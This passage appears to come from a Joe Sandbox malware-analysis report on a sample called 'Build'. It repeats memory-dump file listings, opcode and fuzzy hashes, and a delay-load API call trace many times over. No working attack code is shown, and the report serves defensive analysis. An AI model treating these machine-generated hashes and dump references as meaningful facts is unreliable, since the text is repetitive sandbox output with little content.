                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: f43d8e1451deab9a132a296aeec14c75328918b24fd0a700618abf93b2ea7c73
                                                                                          • Instruction ID: ecdcdb81f13445c8f1b108345a749b11a8f23a7a1a878ad41edf8a4ac95d8514
                                                                                          • Opcode Fuzzy Hash: f43d8e1451deab9a132a296aeec14c75328918b24fd0a700618abf93b2ea7c73
                                                                                          • Instruction Fuzzy Hash: F1B0128636C311AC379F71595C02D3A121CD0C0B11330856EF808C4181E4401CCC4731
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003809FC
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 1b6892bcc318c4b4b184b24d74649e5cd7e61067bd7bee32b306d1ee87cd28a6
                                                                                          • Instruction ID: 7adcf2142821244a85c918c318cea66ae413b0f1f5a59c27d02b6388b2e3a659
                                                                                          • Opcode Fuzzy Hash: 1b6892bcc318c4b4b184b24d74649e5cd7e61067bd7bee32b306d1ee87cd28a6
                                                                                          • Instruction Fuzzy Hash: F9B012CB39C201BD364F3158ED02C77010CC8C0B28330C5BEF411D4042A8511C0D0331
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003809FC
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 820754fe19a9a51ccdf17966e25312f226c1ddc31ad6ba6312459edad149f999
                                                                                          • Instruction ID: 998fb9edbcaa408307ab5011a6fb72232bf68dc47ca12e265590be1e40c0bea2
                                                                                          • Opcode Fuzzy Hash: 820754fe19a9a51ccdf17966e25312f226c1ddc31ad6ba6312459edad149f999
                                                                                          • Instruction Fuzzy Hash: CCB012C739C200ED368F7158EC02D77011CC0C0B10330C5BEF805C5041E4401C0C0331
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003809FC
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: cffe0369203f881a8b586314264f9a4ed76f2cd4e3c2ae1207bf11d24d4db039
                                                                                          • Instruction ID: 070c53dcd4368d4f3c0b5f8b3d2191706a12606aaa5020d4410cf25431a7b740
                                                                                          • Opcode Fuzzy Hash: cffe0369203f881a8b586314264f9a4ed76f2cd4e3c2ae1207bf11d24d4db039
                                                                                          • Instruction Fuzzy Hash: 2FB012C639C200AD368F7168ED02D77010CC0C0B10330C5BEF405C4041E4411C0D0331
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003809FC
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 729b0733253d81d1ec9c58901c7b5d501d67d1e2c3901a12073eeaa1649baf72
                                                                                          • Instruction ID: 47133a1d5f417aeed84ef37319fabc7b6786dc8e486333d56c39697322459822
                                                                                          • Opcode Fuzzy Hash: 729b0733253d81d1ec9c58901c7b5d501d67d1e2c3901a12073eeaa1649baf72
                                                                                          • Instruction Fuzzy Hash: 4EB012C639C300AD378F7169EC02D77010CD0C0B10330867EF405C4181E4411C4C0331
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038068E
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: fcd23a1777af15a2d1c979164791b96ec2f54e6ff9eaa28ad3a6d672dbecd00d
                                                                                          • Instruction ID: ee491a6740091e6f88d1b0a2c335248a8b73995bf7092eeec2b22248f5f0446c
                                                                                          • Opcode Fuzzy Hash: fcd23a1777af15a2d1c979164791b96ec2f54e6ff9eaa28ad3a6d672dbecd00d
                                                                                          • Instruction Fuzzy Hash: CAA0118A2A8203BC328F32A0AC02C3F020CC0C0B2033288AAF00AC8080B8802C8C0230
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038068E
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 82d0b3f00afc91c91ef702bd683735eff6412ee9768e9bad621fb49a3f357818
                                                                                          • Instruction ID: ee491a6740091e6f88d1b0a2c335248a8b73995bf7092eeec2b22248f5f0446c
                                                                                          • Opcode Fuzzy Hash: 82d0b3f00afc91c91ef702bd683735eff6412ee9768e9bad621fb49a3f357818
                                                                                          • Instruction Fuzzy Hash: CAA0118A2A8203BC328F32A0AC02C3F020CC0C0B2033288AAF00AC8080B8802C8C0230
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038068E
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 69992e238debb9bbaa6bd227e69edeccc97762e01c24edae22d57f40831dccf2
                                                                                          • Instruction ID: ee491a6740091e6f88d1b0a2c335248a8b73995bf7092eeec2b22248f5f0446c
                                                                                          • Opcode Fuzzy Hash: 69992e238debb9bbaa6bd227e69edeccc97762e01c24edae22d57f40831dccf2
                                                                                          • Instruction Fuzzy Hash: CAA0118A2A8203BC328F32A0AC02C3F020CC0C0B2033288AAF00AC8080B8802C8C0230
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038068E
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 3b44c542b6263524349789eb7fc4556217835c2c746912733491bde44ce1d08a
                                                                                          • Instruction ID: ee491a6740091e6f88d1b0a2c335248a8b73995bf7092eeec2b22248f5f0446c
                                                                                          • Opcode Fuzzy Hash: 3b44c542b6263524349789eb7fc4556217835c2c746912733491bde44ce1d08a
                                                                                          • Instruction Fuzzy Hash: CAA0118A2A8203BC328F32A0AC02C3F020CC0C0B2033288AAF00AC8080B8802C8C0230
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038068E
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: df0beacf65a64bfe3e988232a38b7752dfdc5a98cfabb1925fe8501c6db7483b
                                                                                          • Instruction ID: ee491a6740091e6f88d1b0a2c335248a8b73995bf7092eeec2b22248f5f0446c
                                                                                          • Opcode Fuzzy Hash: df0beacf65a64bfe3e988232a38b7752dfdc5a98cfabb1925fe8501c6db7483b
                                                                                          • Instruction Fuzzy Hash: CAA0118A2A8203BC328F32A0AC02C3F020CC0C0B2033288AAF00AC8080B8802C8C0230
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038068E
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: c12e0f16e9af6f7b7273161b301278713b1445802f4477b48bf02599d563ae8e
                                                                                          • Instruction ID: ee491a6740091e6f88d1b0a2c335248a8b73995bf7092eeec2b22248f5f0446c
                                                                                          • Opcode Fuzzy Hash: c12e0f16e9af6f7b7273161b301278713b1445802f4477b48bf02599d563ae8e
                                                                                          • Instruction Fuzzy Hash: CAA0118A2A8203BC328F32A0AC02C3F020CC0C0B2033288AAF00AC8080B8802C8C0230
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038068E
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 61f74040b4322b67ed4b43f1b38f6bbecd307a9c113418e669ec48a952a161ab
                                                                                          • Instruction ID: ee491a6740091e6f88d1b0a2c335248a8b73995bf7092eeec2b22248f5f0446c
                                                                                          • Opcode Fuzzy Hash: 61f74040b4322b67ed4b43f1b38f6bbecd307a9c113418e669ec48a952a161ab
                                                                                          • Instruction Fuzzy Hash: CAA0118A2A8203BC328F32A0AC02C3F020CC0C0B2033288AAF00AC8080B8802C8C0230
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038068E
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 76400c2bffd39e47833a6e8357caf188eb727e7f745a0c373f4420b36a4449e6
                                                                                          • Instruction ID: ee491a6740091e6f88d1b0a2c335248a8b73995bf7092eeec2b22248f5f0446c
                                                                                          • Opcode Fuzzy Hash: 76400c2bffd39e47833a6e8357caf188eb727e7f745a0c373f4420b36a4449e6
                                                                                          • Instruction Fuzzy Hash: CAA0118A2A8203BC328F32A0AC02C3F020CC0C0B2033288AAF00AC8080B8802C8C0230
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038068E
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 442e0fb4875adc587645f103abad1749412233a22932a88d25266756a9a2abc0
                                                                                          • Instruction ID: ee491a6740091e6f88d1b0a2c335248a8b73995bf7092eeec2b22248f5f0446c
                                                                                          • Opcode Fuzzy Hash: 442e0fb4875adc587645f103abad1749412233a22932a88d25266756a9a2abc0
                                                                                          • Instruction Fuzzy Hash: CAA0118A2A8203BC328F32A0AC02C3F020CC0C0B2033288AAF00AC8080B8802C8C0230
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038068E
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: fb27f125c29c4fe9a22f010cd40e5ed80921ab9ffbe020ffd4b739d9a99fc426
                                                                                          • Instruction ID: ee491a6740091e6f88d1b0a2c335248a8b73995bf7092eeec2b22248f5f0446c
